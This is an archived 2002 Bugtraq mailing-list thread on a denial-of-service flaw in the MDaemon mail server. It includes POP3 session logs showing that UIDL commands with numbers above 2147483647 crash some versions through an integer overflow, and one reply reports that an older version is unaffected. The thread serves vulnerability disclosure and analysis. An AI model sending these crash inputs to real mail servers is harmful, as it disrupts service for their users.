RE: MDaemon SMTP/POP/IMAP server DoS

["Robert Feldbauer" <wuher () swrpg net>]

I'm running MDaemon 3.1.2 and this does not have any adverse effect.
Here's my log:

+OK daisydata.com POP3 server ready
<MDAEMON-F200210291127.AA274532MD3626 () mydomain com>
USER myusername
+OK myusername... Recipient ok
PASS mypassword
+OK myusername () mydomain com's mailbox has 0 total messages (0 octets).
UIDL 2147483647
-ERR no such message
UIDL 2147483648
+OK -2147483648
UIDL 2147483649
+OK -2147483647
UIDL 2147483650
+OK -2147483646

And it responds to "QUIT" just fine.

Bob Feldbauer
wuher () swrpg net

> -----Original Message-----
> From: Basil Hussain [mailto:basil.hussain () kodakweddings com]
> Sent: Tuesday, October 29, 2002 5:27 AM
> To: bugtraq () securityfocus com
> Subject: RE: MDaemon SMTP/POP/IMAP server DoS
>
>
> Hi all,
>
> > Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by
> > sending long arguments (32b and above) with DELE or UIDL commands.
> > To do this u must have at least mail-account on vulnerable host.
> > After geting long request from client, all MDaemon's Services will be
> > closed (smtp, imap, pop, (?)worldclient).
> > Here the log of attack on local MDaemon POP-server:
> >
> > +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
> > <MDAEMON-F200210
> > 271036.AA3656130MD0012 () dark ru>
> > USER D4rkGr3y
> > +OK D4rkGr3y... Recipient ok
> > PASS cool-pass
> > +OK D4rkGr3y () dark ru's mailbox has 1 total messages (18356 octets).
> > UIDL 11111111111111111111111111111111
>
> It would appear this is not an issue with the length of string passed to
> MDaemon, but rather an integer overflow problem. After some testing, I've
> discovered that if you pass any number greater than 2147483647 (the limit
> for a signed 4-byte integer), you either get an error or a
> complete crash of
> MDaemon. For example:
>
> +OK somedomain.com POP MDaemon 6.0.5 ready
> <MDAEMON-F200210290951.AA5138234MD2795 () somedomain com>
> USER blah
> +OK blah... Recipient ok
> PASS 123456
> +OK blah () somedomain com's mailbox has 0 total messages (0 octets).
> UIDL 2147483647
> -ERR no such message
> UIDL 2147483648
> +OK -2147483648 !!! Index 0 is not used
> UIDL 2147483649
>
> [Connection lost at this point...]
>
> By the way, you may have noticed this also works with a slightly older
> release (6.0.5). Also, hostname and account details have been changed to
> protect the guilty... :-)
>
> Also, I don't know whether this was something with how my test W2K server
> was set up, but MDaemon would auto-restart afterwards, thus
> making this bug
> not so much of a show-stopper and limiting scope for a Denial-of-Service
> attack somewhat.
>
> Regards,
> Basil Hussain